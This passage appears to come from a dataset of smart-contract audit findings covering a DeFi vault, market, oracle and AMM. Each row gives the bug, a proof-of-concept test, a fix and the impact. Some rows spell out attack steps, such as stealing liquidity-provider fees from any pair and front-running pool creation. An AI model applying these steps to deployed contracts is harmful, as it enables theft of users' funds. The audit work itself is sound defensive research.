market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('0.5', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n})\\n```\\n" +All transactions to claim assets from the vault will revert in some situations due to double subtraction of the claimed assets in market position allocations calculation.,medium,"When `assets` are claimed from the vault (Vault.update(0,0,x) called), the vault rebalances its collateral. There is an issue with market positions allocation calculations: the `assets` (""total position"") subtract claimed amount twice. This leads to revert in case this incorrect `assets` amount is less than `minAssets` (caused by market's minPosition). In situations when the vault can't redeem due to some market's position being at the `minPosition` (because of the market's skew, which disallows makers to reduce their positions), this will lead to all users being unable to claim any `assets` which were already redeemed and settled.\\n`Vault.update` rebalances collateral by calling _manage:\\n```\\n_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero());\\n```\\n\\nIn the rebalance calculations, collateral and assets (assets here stands for ""total vault position"") are calculated as following:\\n```\\n UFixed6 collateral = UFixed6Lib.unsafeFrom(strategy.totalCollateral).add(deposit).unsafeSub(withdrawal);\\n UFixed6 assets = collateral.unsafeSub(ineligable);\\n\\n if (collateral.lt(strategy.totalMargin)) revert StrategyLibInsufficientCollateralError();\\n if (assets.lt(strategy.minAssets)) revert StrategyLibInsufficientAssetsError();\\n```\\n\\n`ineligable` is calculated as following:\\n```\\nfunction _ineligable(Context memory context, UFixed6 withdrawal) private pure returns (UFixed6) {\\n // assets eligable for redemption\\n UFixed6 redemptionEligable = 
UFixed6Lib.unsafeFrom(context.totalCollateral)\\n .unsafeSub(withdrawal)\\n .unsafeSub(context.global.assets)\\n .unsafeSub(context.global.deposit);\\n\\n return redemptionEligable\\n // approximate assets up for redemption\\n .mul(context.global.redemption.unsafeDiv(context.global.shares.add(context.global.redemption)))\\n // assets pending claim\\n .add(context.global.assets)\\n // assets withdrawing\\n .add(withdrawal);\\n}\\n```\\n\\nNotice that `ineligable` adds `withdrawal` in the end (which is the assets claimed by the user). Now back to collateral and assets calculation:\\n`collateral = totalCollateral + deposit - withdrawal`\\n`assets = collateral - ineligable = collateral - (redemptionEligable * redemption / (redemption + shares) + global.assets + withdrawal)`\\n`assets = totalCollateral + deposit - withdrawal - [redemptionIneligable] - global.assets - withdrawal`\\n`assets = totalCollateral + deposit - [redemptionIneligable] - global.assets - 2 * withdrawal`\\nSee that `withdrawal` (assets claimed by the user) is subtracted twice in assets calculations. This means that assets calculated are smaller than it should. In particular, assets might become less than minAssets thus reverting in the following line:\\n```\\n if (assets.lt(strategy.minAssets)) revert StrategyLibInsufficientAssetsError();\\n```\\n\\nPossible scenario for this issue to cause inability to claim funds:\\nSome vault market's has a high skew (|long - short|), which means that minimum maker position is limited by the skew.\\nUser redeems large amount from the vault, reducing vault's position in that market so that market maker ~= |long - short|. 
This means that further redeems from the vault are not possible because the vault can't reduce its position in the market.\\nAfter that, the user tries to claim what he has redeemed, but all attempts to redeem will revert (both for this user and for any other user that might want to claim)\\nThe scenario above is demonstrated in the test, change the following test in test/integration/vault/Vault.test.ts:\\n```\\n it('simple deposits and redemptions', async () => {\\n// rest of code\\n // Now we should have opened positions.\\n // The positions should be equal to (smallDeposit + largeDeposit) * leverage originalOraclePrice.\\n expect(await position()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).mul(4).div(5).div(originalOraclePrice),\\n )\\n expect(await btcPosition()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).div(5).div(btcOriginalOraclePrice),\\n )\\n\\n /*** remove all lines after this and replace with the following code: ***/\\n\\n var half = smallDeposit.add(largeDeposit).div(2).add(smallDeposit);\\n await vault.connect(user).update(user.address, 0, half, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).update(user2.address, smallDeposit, 0, 0) // this will create min position in the market\\n await vault.connect(user).update(user.address, 0, 0, half) // this will revert even though it's just claiming\\n })\\n```\\n\\nThe last line in the test will revert, even though it's just claiming assets. 
If the pre-last line is commented out (no ""min position"" created in the market), it will work normally.",Remove `add(withdrawal)` from `_ineligable` calculation in the vault.,"In certain situations (redeem not possible from the vault due to high skew in some underlying market) claiming assets from the vault will revert for all users, temporarily (and sometimes permanently) locking user funds in the contract.","```\\n_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero());\\n```\\n" +"If referral or liquidator is the same address as the account, then liquidation/referral fees will be lost due to local storage being overwritten after the `claimable` amount is credited to liquidator or referral",medium,"Any user (address) can be liquidator and/or referral, including account's own address (the user can self-liquidate or self-refer). During the market settlement, liquidator and referral fees are credited to liquidator/referral's `local.claimable` storage. The issue is that the account's local storage is held in the memory during the settlement process, and is saved into storage after settlement/update. 
This means that `local.claimable` storage changes for the account are not reflected in the in-memory cached copy and discarded when the cached copy is saved after settlement.\\nThis leads to liquidator and referral fees being lost when these are the account's own address.\\nDuring market account settlement process, in the `_processOrderLocal`, liquidator and referral fees are credited to corresponding accounts via:\\n```\\n// rest of code\\n _credit(liquidators[account][newOrderId], accumulationResult.liquidationFee);\\n _credit(referrers[account][newOrderId], accumulationResult.subtractiveFee);\\n// rest of code\\nfunction _credit(address account, UFixed6 amount) private {\\n if (amount.isZero()) return;\\n\\n Local memory newLocal = _locals[account].read();\\n newLocal.credit(amount);\\n _locals[account].store(newLocal);\\n}\\n```\\n\\nHowever, for the account the cached copy of `_locals[account]` is stored after the settlement in _storeContext:\\n```\\nfunction _storeContext(Context memory context, address account) private {\\n // state\\n _global.store(context.global);\\n _locals[account].store(context.local);\\n// rest of code\\n```\\n\\nThe order of these actions is:\\n```\\nfunction settle(address account) external nonReentrant whenNotPaused {\\n Context memory context = _loadContext(account);\\n\\n _settle(context, account);\\n\\n _storeContext(context, account);\\n}\\n```\\n\\nLoad `_locals[account]` into memory (context.local)\\nSettle: during settlement `_locals[account].claimable` is increased for liquidator and referral. 
Note: this is not reflected in `context.local`\\nStore cached context: `_locals[account]` is overwritten with the `context.local`, losing `claimable` increased during settlement.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('self-liquidation fees lost', async () => {\\nconst POSITION = parse6decimal('100.000')\\nconst COLLATERAL = parse6decimal('120')\\n\\nfunction setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n}\\n\\ndsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\n\\nvar time = TIMESTAMP;\\n\\nsetupOracle('1', time, time + 100);\\nawait market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n\\ntime += 100;\\nsetupOracle('1', time, time + 100);\\nawait market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, POSITION, 0, COLLATERAL, false);\\n\\ntime += 100;\\nsetupOracle('1', time, time + 100);\\n\\ntime += 100;\\nsetupOracle('0.7', time, time + 100);\\n\\n// self-liquidate\\nsetupOracle('0.7', time, time + 100);\\nawait market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, true);\\n\\n// settle liquidation\\ntime += 100;\\nsetupOracle('0.7', time, time + 100);\\nawait market.settle(userB.address);\\nvar info = await market.locals(userB.address);\\nconsole.log(""Claimable userB: "" + info.claimable);\\n```\\n\\nConsole log:\\n```\\nClaimable userB: 0\\n```\\n",Modify `Market._credit` function to 
increase `context.local.claimable` if account to be credited matches account which is being updated.,"If user self-liquidates or self-refers, the liquidation and referral fees are lost by the user (and are stuck in the contract, because they're still subtracted from the user's collateral).","```\\n// rest of code\\n _credit(liquidators[account][newOrderId], accumulationResult.liquidationFee);\\n _credit(referrers[account][newOrderId], accumulationResult.subtractiveFee);\\n// rest of code\\nfunction _credit(address account, UFixed6 amount) private {\\n if (amount.isZero()) return;\\n\\n Local memory newLocal = _locals[account].read();\\n newLocal.credit(amount);\\n _locals[account].store(newLocal);\\n}\\n```\\n" +_loadContext() uses the wrong pendingGlobal.,medium,"`StrategyLib._loadContext()` is using the incorrect `pendingGlobal`, causing `currentPosition`, `minPosition`, and `maxPosition` to be incorrect, leading to incorrect rebalance operation.\\nIn `StrategyLib._loadContext()`, there is a need to compute `currentPosition`, `minPosition`, and `maxPosition`. 
The code as follows:\\n```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n\\nThe code above `pendingGlobal = registration.market.pendings(address(this));` is wrong It takes the address(this)'s `pendingLocal`. The correct approach is to use `pendingGlobal = registration.market.pending();`.",```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n// Remove the line below\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n// Add the line below\\n Order memory pendingGlobal = registration.market.pending();\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n,"Since `pendingGlobal` is wrong, `currentPosition`, `minPosition` and `maxPosition` are all 
wrong. affects subsequent rebalance calculations, such as `target.position` etc. rebalance does not work properly",```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n +Liquidator can set up referrals for other users,medium,"If a user has met the liquidation criteria and currently has no referrer then a malicious liquidator can specify a referrer in the liquidation order. 
making it impossible for subsequent users to set up the referrer they want.\\nCurrently, there are 2 conditions to set up a referrer\\nthe order cannot be empty (Non-empty orders require authorization unless they are liquidation orders)\\nthere can't be another referrer already\\n```\\n function _loadUpdateContext(\\n Context memory context,\\n address account,\\n address referrer\\n ) private view returns (UpdateContext memory updateContext) {\\n// rest of code\\n updateContext.referrer = referrers[account][context.local.currentId];\\n updateContext.referralFee = IMarketFactory(address(factory())).referralFee(referrer);\\n }\\n\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n\\n\\n function _storeUpdateContext(Context memory context, UpdateContext memory updateContext, address account) private {\\n// rest of code\\n referrers[account][context.local.currentId] = updateContext.referrer;\\n }\\n```\\n\\nHowever, if the user does not have a referrer, the liquidation order is able to meet both of these restrictions\\nThis allows the liquidator to set up referrals for other users.\\nWhen the user subsequently tries to set up a referrer, it will fail.","Restrictions on Liquidation Orders Cannot Set a referrer\\n```\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n// Add the line below\\n if (newOrder.protected() && referrer != address(0)) revert MarketInvalidReferrerError;\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if 
(updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n```\\n","If a user is set up as a referrer by a liquidated order in advance, the user cannot be set up as anyone else.","```\\n function _loadUpdateContext(\\n Context memory context,\\n address account,\\n address referrer\\n ) private view returns (UpdateContext memory updateContext) {\\n// rest of code\\n updateContext.referrer = referrers[account][context.local.currentId];\\n updateContext.referralFee = IMarketFactory(address(factory())).referralFee(referrer);\\n }\\n\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n\\n\\n function _storeUpdateContext(Context memory context, UpdateContext memory updateContext, address account) private {\\n// rest of code\\n referrers[account][context.local.currentId] = updateContext.referrer;\\n }\\n```\\n" +"Vault and oracle keepers DoS in some situations due to `market.update(account,max,max,max,0,false)`",medium,"When user's market account is updated without position and collateral change (by calling market.update(account,max,max,max,0,false)), this serves as some kind of ""settling"" the account (which was the only way to settle the account before v2.3). However, this action still reverts if the account is below margin requirement.\\nThe issue is that some parts of the code use this action to ""settle"" the account in the assumption that it never reverts which is not true. 
This causes unexpected reverts and denial of service to users who cannot execute transactions in some situations, in particular:\\nOracle `KeeperFactory.settle` uses this method to settle all accounts in the market for the oracle version and will revert entire market version's settlement if any account which is being settled is below margin requirement. Example scenario: 1.1. User increases position to the edge of margin requirement 1.2. The price rises slightly for the committed oracle version, and user position is settled and is now slightly below margin requirements 1.3. All attempts to settle accounts for the committed oracle version for this market will revert as user's account collateral is below margin requirements.\\nVault `Vault._updateUnderlying` uses this method to settle all vault's accounts in the markets. This function is called at the start of `rebalance` and `update`, with `rebalance` also being called before any admin vault parameters changes such as updating market leverages, weights or cap. This becomes especially problematic if any market is ""removed"" from the vault by setting its weight to 0, but the market still has some position due to `minPosition` limitation (as described in another issue). In such case each vault `update` will bring this market's position to exact edge of margin requirement, meaning a lot of times minimal price changes will put the vault's market account below margin requirement, and as such most Vault functions will revert (update, `rebalance` and admin param changes). 
Moreover, since the vault rebalances collateral and/or position size only in `_manage` (which is called only from `update` and rebalance), this means that the vault is basically bricked until this position is either liquidated or goes above margin requirement again due to price changes.\\nWhen `Market.update` is called, any parameters except `protected = true` will perform the following check from the InvariantLib.validate:\\n```\\nif (\\n !PositionLib.margined(\\n context.latestPosition.local.magnitude().add(context.pending.local.pos()),\\n context.latestOracleVersion,\\n context.riskParameter,\\n context.local.collateral\\n )\\n) revert IMarket.MarketInsufficientMarginError();\\n```\\n\\nThis means that even updates which do not change anything (empty order and 0 collateral change) still perform this check and revert if the user's collateral is below margin requirement.\\nSuch method to settle accounts is used in KeeperOracle._settle:\\n```\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nThis is called from `KeeperFactory.settle`, which the keepers are supposed to call to settle market accounts after the oracle version is commited. This will revert, thus keepers will temporarily be unable to call this function for the specific oracle version until all users are at or above margin.\\nThe same method is used to settle accounts in Vault._updateUnderlying:\\n```\\nfunction _updateUnderlying() private {\\n for (uint256 marketId; marketId < totalMarkets; marketId++)\\n _registrations[marketId].read().market.update(\\n address(this),\\n UFixed6Lib.MAX,\\n UFixed6Lib.ZERO,\\n UFixed6Lib.ZERO,\\n Fixed6Lib.ZERO,\\n false\\n );\\n}\\n```\\n","Depending on intended functionality:\\nIgnore the margin requirement for empty orders and collateral change which is >= 0. 
AND/OR\\nUse `Market.settle` instead of `Market.update` to `settle` accounts, specifically in `KeeperOracle._settle` and in `Vault._updateUnderlying`. There doesn't seem to be any reason or issue to use `settle` instead of `update`, it seems that `update` is there just because there was no `settle` function available before.","Keepers are unable to settle market accounts for the commited oracle version until all accounts are above margin. The oracle fees are still taken from all accounts, but the keepers are blocked from receiving it.\\nIf any Vault's market weight is set to 0 (or if vault's position in any market goes below margin for whatever other reason), most of the time the vault will temporarily be bricked until vault's position in that market is liquidated. The only function working in this state is `Vault.settle`, even all admin functions will revert.","```\\nif (\\n !PositionLib.margined(\\n context.latestPosition.local.magnitude().add(context.pending.local.pos()),\\n context.latestOracleVersion,\\n context.riskParameter,\\n context.local.collateral\\n )\\n) revert IMarket.MarketInsufficientMarginError();\\n```\\n" +Vault checkpoints slightly incorrect conversion from assets to shares leads to slow loss of funds for long-time vault depositors,medium,"When vault checkpoints convert assets to shares (specifically used to calculate user's shares for their deposit), it uses the following formula: `shares = (assets[before fee] - settlementFee) * checkpoint.shares/checkpoint.assets * (deposit + redeem - tradeFee) / (deposit + redeem)`\\n`settlementFee` in this formula is taken into account slightly incorrectly: in actual market collateral calculations, both settlement fee and trade fee are subtracted from collateral, but this formula basically multiplies `1 - settlement fee percentage` by `1 - trade fee percentage`, which is slightly different and adds the calculation error = `settlement fee percentage * trade fee percentage`.\\nThis is the scenario to better 
understand the issue:\\nLinear fee = 2%, settlement fee = $1\\nUser1 deposits $100 into the vault (linear fee = $2, settlement fee = $1)\\nVault assets = $97 (due to fees), User1 shares = 100\\nUser2 deposits $100 into the vault (linear fee = $2, settlement fee = $1)\\nVault assets = $194, User1 shares = 100, but User2 shares = 100.02, meaning User1's share value has slightly fallen due to a later deposit.\\nThis is the calculation for User2 shares: `shares = ($100 - $1) * 100/$97 * ($100 - $2) / $100 = $99 * 100/$97 * $98/$100 = $99 * 98/$97 = 100.02`\\nThe extra 0.02 this user has received is because the `tradeFee` is taken from the amount after settlement fee ($99) rather than full amount as it should ($100). This difference (settlementFee * `tradeFee` = $0.02) is unfair amount earned by User2 and loss of funds for User1.\\nWhen redeeming, the formula for shares -> assets vault checkpoint conversion is correct and the correct amount is redeemed.\\nThis issue leads to all vault depositors slowly losing share value with each deposit, and since no value is gained when redeeming, continuous deposits and redeems will lead to all long-time depositors continuously losing their funds.\\nThis is the formula for vault checkpoint toSharesGlobal:\\n```\\nfunction toSharesGlobal(Checkpoint memory self, UFixed6 assets) internal pure returns (UFixed6) {\\n // vault is fresh, use par value\\n if (self.shares.isZero()) return assets;\\n\\n // if vault is insolvent, default to par value\\n return self.assets.lte(Fixed6Lib.ZERO) ? 
assets : _toShares(self, _withoutSettlementFeeGlobal(self, assets));\\n}\\n\\nfunction _toShares(Checkpoint memory self, UFixed6 assets) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n return _withSpread(self, assets.muldiv(self.shares, selfAssets));\\n}\\n\\nfunction _withSpread(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n UFixed6 totalAmount = self.deposit.add(self.redemption.muldiv(selfAssets, self.shares));\\n UFixed6 totalAmountIncludingFee = UFixed6Lib.unsafeFrom(Fixed6Lib.from(totalAmount).sub(self.tradeFee));\\n\\n return totalAmount.isZero() ?\\n amount :\\n amount.muldiv(totalAmountIncludingFee, totalAmount);\\n}\\n\\nfunction _withoutSettlementFeeGlobal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n return _withoutSettlementFee(amount, self.settlementFee);\\n}\\n\\nfunction _withoutSettlementFee(UFixed6 amount, UFixed6 settlementFee) private pure returns (UFixed6) {\\n return amount.unsafeSub(settlementFee);\\n}\\n```\\n\\nThis code translates to a formula shown above, i.e. it first subtracts settlement fee from the assets (withoutSettlementFeeGlobal), then multiplies this by checkpoint's share value in `_toShares` (*checkpoint.shares/checkpoint.assets), and then multiplies this by trade fee adjustment in `_withSpread` (*(deposit+redeem-tradeFee) / (deposit+redeem)). 
Here is the formula again: `shares = (assets[before fee] - settlementFee) * checkpoint.shares/checkpoint.assets * (deposit + redeem - tradeFee) / (deposit + redeem)`\\nAs shown above, the formula is incorrect, because it basically does the following: `user_assets = (deposit - settlementFee) * (deposit - tradeFee)/deposit = deposit * (1 - settlementFeePct) * (1 - tradeFeePct)`\\nBut the actual user collateral after fees is calculated as: `user_assets = deposit - settlementFee - tradeFee = deposit * (1 - settlementFeePct - tradeFeePct)`\\nIf we subtract the actual collateral from the formula used in checkpoint, we get the error: `error = deposit * ((1 - settlementFeePct) * (1 - tradeFeePct) - (1 - settlementFeePct - tradeFeePct))` `error = deposit * settlementFeePct * tradeFeePct` `error = settlementFee * tradeFeePct`\\nSo this is systematic error, which inflates the shares given to users with any deposit by fixed amount of `settlementFee * tradeFeePct`",Re-work the assets to shares conversion in vault checkpoint to use the correct formula: `shares = (assets[before fee] - settlementFee - tradeFee * assets / (deposit + redeem)) * checkpoint.shares/checkpoint.assets`,"Any vault deposit reduces the vault assets by `settlementFee * tradeFeePct`. While this amount is not very large (in the order of $0.1 - $0.001 per deposit transaction), this is amount lost with each deposit, and given that an active vault can easily have 1000s of transactions daily, this will be a loss of $1-$100/day, which is significant enough to make it a valid issue.","```\\nfunction toSharesGlobal(Checkpoint memory self, UFixed6 assets) internal pure returns (UFixed6) {\\n // vault is fresh, use par value\\n if (self.shares.isZero()) return assets;\\n\\n // if vault is insolvent, default to par value\\n return self.assets.lte(Fixed6Lib.ZERO) ? 
assets : _toShares(self, _withoutSettlementFeeGlobal(self, assets));\\n}\\n\\nfunction _toShares(Checkpoint memory self, UFixed6 assets) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n return _withSpread(self, assets.muldiv(self.shares, selfAssets));\\n}\\n\\nfunction _withSpread(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n UFixed6 totalAmount = self.deposit.add(self.redemption.muldiv(selfAssets, self.shares));\\n UFixed6 totalAmountIncludingFee = UFixed6Lib.unsafeFrom(Fixed6Lib.from(totalAmount).sub(self.tradeFee));\\n\\n return totalAmount.isZero() ?\\n amount :\\n amount.muldiv(totalAmountIncludingFee, totalAmount);\\n}\\n\\nfunction _withoutSettlementFeeGlobal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n return _withoutSettlementFee(amount, self.settlementFee);\\n}\\n\\nfunction _withoutSettlementFee(UFixed6 amount, UFixed6 settlementFee) private pure returns (UFixed6) {\\n return amount.unsafeSub(settlementFee);\\n}\\n```\\n" +ChainlinkFactory will pay non-requested versions keeper fees,medium,"Protocol definition: `Requested versions will pay out a keeper fee, non-requested versions will not.` But ChainlinkFactory ignores `numRequested`, which pays for both.\\nProtocol definition: `Requested versions will pay out a keeper fee, non-requested versions will not.`\\n```\\n /// @notice Commits the price to specified version\\n /// @dev Accepts both requested and non-requested versions.\\n /// Requested versions will pay out a keeper fee, non-requested versions will not.\\n /// Accepts any publish time in the underlying price message, as long as it is within the validity window,\\n /// which means its possible for publish times to be slightly out of order with respect to versions.\\n /// Batched updates are supported by passing in a list of price feed ids along with a valid batch update data.\\n 
/// @param ids The list of price feed ids to commit\\n /// @param version The oracle version to commit\\n /// @param data The update data to commit\\n function commit(bytes32[] memory ids, uint256 version, bytes calldata data) external payable {\\n```\\n\\ncommit()->_handleKeeperFee()->_applicableValue() `ChainlinkFactory._applicableValue ()` implements the following:\\n```\\n function _applicableValue(uint256, bytes memory data) internal view override returns (uint256) {\\n bytes[] memory payloads = abi.decode(data, (bytes[]));\\n uint256 totalFeeAmount = 0;\\n for (uint256 i = 0; i < payloads.length; i++) {\\n (, bytes memory report) = abi.decode(payloads[i], (bytes32[3], bytes));\\n (Asset memory fee, ,) = feeManager.getFeeAndReward(address(this), report, feeTokenAddress);\\n totalFeeAmount += fee.amount;\\n }\\n return totalFeeAmount;\\n }\\n```\\n\\nThe above method ignores the first parameter `numRequested`. This way, whether it is `Requested versions` or not, you will pay `keeper fees`. 
Violating `non-requested versions will not pay`","It is recommended that only `Requested versions` keeper fees'\\n```\\n// Remove the line below\\n function _applicableValue(uint256 , bytes memory data) internal view override returns (uint256) {\\n// Add the line below\\n function _applicableValue(uint256 numRequested, bytes memory data) internal view override returns (uint256) {\\n bytes[] memory payloads = abi.decode(data, (bytes[]));\\n uint256 totalFeeAmount = 0;\\n for (uint256 i = 0; i < payloads.length; i// Add the line below\\n// Add the line below\\n) {\\n (, bytes memory report) = abi.decode(payloads[i], (bytes32[3], bytes));\\n (Asset memory fee, ,) = feeManager.getFeeAndReward(address(this), report, feeTokenAddress);\\n totalFeeAmount // Add the line below\\n= fee.amount;\\n }\\n// Remove the line below\\n return totalFeeAmount;\\n// Add the line below\\n return totalFeeAmount * numRequested / payloads.length ;\\n }\\n```\\n","If `non-requested versions` will pay as well, it is easy to maliciously submit `non-requested` maliciously consume `ChainlinkFactory` fees balance (Note that needs at least one numRequested to call `_handleKeeperFee()` )","```\\n /// @notice Commits the price to specified version\\n /// @dev Accepts both requested and non-requested versions.\\n /// Requested versions will pay out a keeper fee, non-requested versions will not.\\n /// Accepts any publish time in the underlying price message, as long as it is within the validity window,\\n /// which means its possible for publish times to be slightly out of order with respect to versions.\\n /// Batched updates are supported by passing in a list of price feed ids along with a valid batch update data.\\n /// @param ids The list of price feed ids to commit\\n /// @param version The oracle version to commit\\n /// @param data The update data to commit\\n function commit(bytes32[] memory ids, uint256 version, bytes calldata data) external payable {\\n```\\n" +Liquidity provider fees can 
be stolen from any pair,high,"An attacker can steal the liquidity providers' fees by transferring liquidity tokens to the pair and then withdrawing fees on behalf of the pair itself.\\nThis is possible because of two reasons:\\nTransferring liquidity tokens to the pair itself doesn't update the fee tracking variables:\\n```\\nif (to != address(this)) {\\n _updateFeeRewards(to);\\n}\\n```\\n\\nwhich results in the variable `feesPerTokenPaid[address(pair)]` of the pair being equal to 0.\\nThe function withdrawFees() is a permissionless function that allows anyone to withdraw fees on behalf of any address, including the pair itself.\\nBy combining these two quirks of the codebase an attacker can steal all of the currently pending liquidity provider fees by doing the following:\\nAdd liquidity to a pair, which will mint the attacker some liquidity tokens\\nTransfer the liquidity tokens to the pair directly\\nCall withdrawFees() by passing the address of the pair. Because `feesPerTokenPaid[address(pair)]` is 0 this will collect fees on behalf of the pair even if it shouldn't. 
The function will transfer an amount `x` of WETH from the pair to the pair itself and will lower the `_pendingLiquidityFee` variable by that same amount\\nBecause the variable `_pendingLiquidityFee` has been lowered by `x` the pool will assume someone transferred `x` WETH to it\\nAt this point the attacker can take advantage of this however he likes, but for the sake of the example let's suppose he calls swap() to swap `x` ETH into tokens that will be transferred to his wallet\\nThe attacker burns the liquidity transferred at point `2` to recover his funds\\nPOC\\n",In withdrawFees(pair) add a require statement to prevent fees being withdrawn on behalf of the pool.\\n```\\nrequire(to != address(this));\\n```\\n,Liquidity provider fees can be stolen from any pair.,```\\nif (to != address(this)) {\\n _updateFeeRewards(to);\\n}\\n```\\n +Some unusual problems arise in the use of the `GoatV1Factory.sol#createPair()` function.,medium,"If you create a new pool for tokens and add liquidity using the `GoatRouterV1.sol#addLiquidity()` function, the bootstrap function of the protocol is broken. Therefore, an attacker can perform the front running attack on the `GoatRouterV1.sol#addLiquidity()` function by front calling `GoatV1Factory.sol#createPair()`.\\nIf a pool for the token does not exist, the LP can create a new pool using the `GoatV1Factory.sol#createPair()` function. Next he calls `GoatRouterV1.sol#addLiquidity()` to provide liquidity. 
At this time, the amount of WETH and ERC20Token provided to the pool is calculated in the `GoatRouterV1.sol#_addLiquidity()` function.\\n```\\n function _addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n GoatTypes.InitParams memory initParams\\n ) internal returns (uint256, uint256, bool) {\\n GoatTypes.LocalVariables_AddLiquidity memory vars;\\n GoatV1Pair pair = GoatV1Pair(GoatV1Factory(FACTORY).getPool(token));\\n if (address(pair) == address(0)) {\\n // First time liquidity provider\\n pair = GoatV1Pair(GoatV1Factory(FACTORY).createPair(token, initParams));\\n vars.isNewPair = true;\\n }\\n\\n if (vars.isNewPair) {\\n// rest of codeSNIP\\n } else {\\n /**\\n * @dev This block is accessed after the presale period is over and the pool is converted to AMM\\n */\\n (uint256 wethReserve, uint256 tokenReserve) = pair.getReserves();\\n uint256 tokenAmountOptimal = GoatLibrary.quote(wethDesired, wethReserve, tokenReserve);\\n if (tokenAmountOptimal <= tokenDesired) {\\n if (tokenAmountOptimal < tokenMin) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n (vars.tokenAmount, vars.wethAmount) = (tokenAmountOptimal, wethDesired);\\n } else {\\n uint256 wethAmountOptimal = GoatLibrary.quote(tokenDesired, tokenReserve, wethReserve);\\n assert(wethAmountOptimal <= wethDesired);\\n if (wethAmountOptimal < wethMin) revert GoatErrors.InsufficientWethAmount();\\n (vars.tokenAmount, vars.wethAmount) = (tokenDesired, wethAmountOptimal);\\n }\\n }\\n return (vars.tokenAmount, vars.wethAmount, vars.isNewPair);\\n }\\n```\\n\\nFor simplicity, let's only consider from #L250 to #L256.\\nL250:wethReserve = virtualEth, tokenReserve = initialTokenMatch - (initialTokenMatch - ((virtualEth * 